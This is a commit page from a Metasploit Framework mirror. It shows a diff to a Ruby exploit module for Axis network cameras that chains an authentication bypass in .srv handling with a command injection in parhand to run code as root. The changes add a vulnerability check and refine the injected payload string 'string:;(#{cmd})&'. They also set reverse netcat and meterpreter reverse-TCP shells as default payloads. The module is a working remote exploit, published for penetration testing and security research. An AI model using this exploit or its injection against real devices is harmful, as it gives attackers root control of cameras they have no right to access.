infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #10712, Make exploit/linux/http/axis_srv_parhand_rce more stable

4.x
Wei Chen 2018-10-04 10:10:28 -05:00 committed by Metasploit
parent 757d69014a
commit 097a00bcab
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
1 changed files with 50 additions and 26 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

76
modules/exploits/linux/http/axis_srv_parhand_rce.rb
View File

@ -12,12 +12,12 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Axis Network Camera .srv to parhand RCE',
'Description' => %q{
'Name' => 'Axis Network Camera .srv to parhand RCE',
'Description' => %q{
This module exploits an auth bypass in .srv functionality and a
command injection in parhand to execute code as the root user.
},
'Author' => [
'Author' => [
'Or Peles', # Vulnerability discovery (VDOO)
'wvu', # Metasploit module
'sinn3r', # Metasploit module
@ -28,40 +28,62 @@ class MetasploitModule < Msf::Exploit::Remote
'Chris Lee', # Metasploit module
'Cale Black' # Metasploit module
],
'References' => [
'References' => [
['CVE', '2018-10660'],
['CVE', '2018-10661'],
['CVE', '2018-10662'],
['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'],
['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf']
],
'DisclosureDate' => 'Jun 18 2018',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_ARMLE],
'Privileged' => true,
'Targets' => [
'DisclosureDate' => 'Jun 18 2018',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_ARMLE],
'Privileged' => true,
'Targets' => [
['Unix In-Memory',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'Payload' => {
'BadChars' => ' ',
'Encoder' => 'cmd/ifs',
'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'netcat-e'}
}
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'Payload' => {
'BadChars' => ' ',
'Encoder' => 'cmd/ifs',
'Compat' => {
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat-e'
}
},
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
}
],
['Linux Dropper',
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Type' => :linux_dropper
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Type' => :linux_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
}
]
],
'DefaultTarget' => 1,
'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'}
'DefaultTarget' => 1,
'DefaultOptions' => {'WfsDelay' => 10}
))
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => "/index.html/#{rand_srv}"
)
if res && res.code == 204
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit
case target['Type']
when :unix_memory
@ -72,8 +94,6 @@ class MetasploitModule < Msf::Exploit::Remote
end
def execute_command(cmd, opts = {})
rand_srv = "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
send_request_cgi(
'method' => 'POST',
'uri' => "/index.html/#{rand_srv}",
@ -81,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
'action' => 'dbus',
'args' => dbus_send(
method: :set_param,
param: "string:root.Time.DST.Enabled string:;#{cmd}"
param: "string:root.Time.DST.Enabled string:;(#{cmd})&"
)
}
)
@ -111,4 +131,8 @@ class MetasploitModule < Msf::Exploit::Remote
args
end
def rand_srv
"#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
end
end